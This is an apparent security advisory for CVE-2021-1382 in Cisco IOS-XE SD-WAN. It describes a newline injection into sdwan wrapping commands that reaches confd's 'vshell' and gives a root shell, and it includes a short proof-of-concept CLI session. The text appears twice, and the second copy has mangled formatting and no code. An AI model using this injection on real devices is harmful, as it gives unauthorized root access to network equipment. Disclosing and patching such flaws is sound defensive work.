Overview
Cisco cEdge provides sdwan wrapping commands that are executed on Confd. Confd show mode is not supposed to be accessible to cEdge users (only Confd conf mode is available).
In Confd show mode there is 'vshell' dangerous command than gives a shell on the IOS-XE.
Impact
As an authenticated user, by injecting confd commands within the sdwan wrapping commands on IOS-XE cli we succeed to execute unrestricted shell as root.
Detail
IOS-XE CLI provides commands for sdwan. These commands are sent to confd through confd_cli.
Example:
clear sdwan policy access-list "aaaa"
/bin/bash /tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf/execute_confd_cli.sh -nis viptela-clear:clear policy access-list name aaaa
echo -e "$( (echo "viptela-clear:clear policy access-list name aaaa" ; sleep 2) | confd_cli -C -g sdwan-oper )"
sdwan-oper force the execution in "show mode" on confd.
By inserting some \n characters (thanks to "term shell") it is possible to trigger vshell confd command and then execute arbitrary shell.
Proof of Concept
NR-4221-3#term shell
NR-4221-3#clear sdwan policy access-list "aaaa
DblQuotTkn>vshell
DblQuotTkn>
DblQuotTkn>id
DblQuotTkn>"
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_confd_t:s0
NR-4221-3#
Solution
Security patch
Cisco fixed this vulnerability from:
- 17.6.1a and later
- 17.5.1a and later
- 17.4.2 and later
- 17.3.4a and later
- 17.3.3 and later
- 17.2.3 and later
- 17.2.2 and later
- 17.2.1v and later
- 17.2.1r and later
- 16.12.5 and later
- 16.12.4a and later
- 16.12.4 and later
- 16.12.3 and later
- 16.11.1a and later
Workaround
There are no workarounds that address this vulnerability.
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xesdwcinj-t68PPW7m
https://nvd.nist.gov/vuln/detail/CVE-2021-1382
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Timeline
Date reported: November 27, 2020
Date fixed: March 24, 2021
Overview
Cisco cEdge provides sdwan wrapping commands that are executed on Confd. Confd show mode is not supposed to be accessible to cEdge users (only Confd conf mode is available).
In Confd show mode there is 'vshell' dangerous command than gives a shell on the IOS-XE.
Impact
As an authenticated user, by injecting confd commands within the sdwan wrapping commands on IOS-XE cli we succeed to execute unrestricted shell as root.
Detail
IOS-XE CLI provides commands for sdwan. These commands are sent to confd through confd_cli.
Example:
sdwan-operforce the execution in "show mode" on confd.By inserting some
\ncharacters (thanks to "term shell") it is possible to triggervshellconfd command and then execute arbitrary shell.Proof of Concept
Solution
Security patch
Cisco fixed this vulnerability from:
Workaround
There are no workarounds that address this vulnerability.
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xesdwcinj-t68PPW7m
https://nvd.nist.gov/vuln/detail/CVE-2021-1382
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Timeline
Date reported: November 27, 2020
Date fixed: March 24, 2021